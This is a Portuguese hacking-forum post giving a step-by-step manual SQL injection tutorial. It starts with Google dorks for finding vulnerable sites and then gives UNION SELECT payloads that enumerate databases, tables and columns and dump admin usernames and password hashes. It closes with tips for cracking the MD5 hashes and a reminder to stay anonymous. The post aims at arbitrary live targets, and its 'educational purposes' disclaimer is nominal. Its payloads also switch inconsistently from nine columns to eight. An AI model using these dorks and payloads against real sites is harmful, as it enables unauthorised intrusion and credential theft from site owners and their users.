COVIL HACKER

, ! .


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Injeção manual de SQL


Injeção manual de SQL

1 2 2

1

Injeção manual de SQL.

Passo 1: Encontrar um alvo.
Para aqueles que são novos em hacking na web, usar o google dorks pode realmente ajudar. Aqui estão alguns:
Código:

inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

Clique em um link, deixe-o carregar. Se carregar corretamente, coloque um ' no final, você obterá algo semelhante a isto:

NORMAL:
https://forumupload.ru/uploads/001b/c9/09/2/t926532.jpg

TESTE:
https://forumupload.ru/uploads/001b/c9/09/2/t811443.jpg

É explorável!
Etapa 2: encontre o número de colunas.

Agora, tire o ' e adicione: order by 5--
Se você receber um erro, legal, continue lendo de qualquer maneira. Se não, continue a ler - você precisa.
Continue adicionando 5 até obter uma tela semelhante a esta:

https://forumupload.ru/uploads/001b/c9/09/2/t143203.jpg

Em seguida, entre o 5 funcional e o 5 não funcional, aumente a ordem por número em 1 a cada vez (ordem por 6--, ordem por 7--, etc.) até que não carregue ou dê um erro. Claro, com minha sorte, recebi o erro ON error 10. Portanto, existem 9 colunas!

Etapa 3: descubra qual coluna é vulnerável.

Depois de id=, coloque um -
Isso é importante!
Em seguida, digite após o número, union all select 1,2,3,4,5,6,7,8,9--
Obviamente, se seu site tiver apenas 4 colunas, seria union all select 1,2, 3,4
Você saberá qual coluna é vulnerável diretamente.

Exemplo:
https://forumupload.ru/uploads/001b/c9/09/2/t855913.jpg

Etapa 4: Obtenha a versão do MySQL

Para a coluna vulnerável, substitua o número por @@version

Exemplo:
https://forumupload.ru/uploads/001b/c9/09/2/t27297.jpg

A partir de agora, exemplos serão mostrados como meus, basta modificar isso para funcionar com seu site!

Etapa 5: obter bancos de dados

Altere suas informações para: union all select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--

https://forumupload.ru/uploads/001b/c9/09/2/t180763.jpg

Em seguida, altere group_concat(schema_name) para database(), que fornecerá seu banco de dados atual.

Etapa 6: obter tabelas A

seguir:

union all select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--

Deve fornecer a lista de tabelas. Imgur parou de funcionar, então comece a pensar!;D

Eu tenho uma tabela chamada admin. Claro que sim!

Etapa 7: Obtenha
a união de colunas, selecione 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--

Eu tenho algumas colunas, uma chamada adminUser e outra chamada adminPassword .

Etapa 8: Logins de administrador!
Você está quase pronto!

union all select 1,group_concat(adminUser,0x3a,adminPassword,0x3a),3,4,5,6,7,8 from admin--

Lembre-se, colunas entre parênteses, tabela no final

Se você obtiver strings do que parece ser randomizado letras e números, isso é md5, então apenas google "descriptografar md5 online" ou obter Cain e Abel

A partir daí, acho que você sabe o que fazer. Piscadela

Isso é apenas para propósitos educacionais. Você é responsável pelo que faz, mas lembre-se de permanecer anônimo!

0

2


» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Injeção manual de SQL


|